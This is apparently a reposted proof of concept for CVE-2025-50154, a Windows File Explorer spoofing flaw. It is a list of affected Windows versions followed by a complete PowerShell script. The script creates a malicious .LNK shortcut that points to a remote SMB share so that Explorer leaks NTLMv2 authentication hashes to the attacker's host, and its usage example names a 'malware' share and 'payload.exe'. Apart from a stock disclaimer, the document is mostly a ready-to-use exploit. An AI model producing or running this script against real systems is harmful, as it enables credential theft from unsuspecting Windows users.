CVE-2025-50154｜Microsoft Windows 文件资源管理器欺骗漏洞（POC）

Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2025
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows Server 2025 (Server Core installation)
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems

<#
.SYNOPSIS
    Creates a malicious LNK file that triggers SMB NTLMv2-SSP hash disclosure.
    This code is for educational and research purposes only.
    The author takes no responsibility for any misuse of this code.
.DESCRIPTION
    This script generates a .LNK shortcut pointing to a remote SMB-hosted binary file.
    The shortcut uses a default Windows icon (SHELL32.dll) but still forces Explorer to
    fetch the PE icon from the remote binary, triggering authentication.
.PARAMETER path
    Local path where the LNK file will be saved (e.g., C:\Users\User\Desktop).
.PARAMETER ip
    IP address or hostname of the remote SMB server hosting the binary.
.PARAMETER share
    The shared folder on the SMB server where the binary is stored.
.PARAMETER file
    The name of the binary file (e.g., payload.exe).
.EXAMPLE
    .\poc.ps1 -path "C:\Temp" -ip "192.168.1.10" -share "malware" -file "payload.exe"
#>
param(
    [Parameter(Mandatory=$true)]
    [string]$path,    # -path
    [Parameter(Mandatory=$true)]
    [string]$ip,      # -ip
    [Parameter(Mandatory=$true)]
    [string]$share,   # -share
    [Parameter(Mandatory=$true)]
    [string]$file     # -file
)
# Build file paths
$shortcutPath = Join-Path $path "poc.lnk"
$targetPath = "\\$ip\$share\$file"
$iconLocation = "C:\Windows\System32\SHELL32.dll"
# Create LNK file
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()
Write-Output "Shortcut created at: $shortcutPath"
Write-Output "Target path: $targetPath"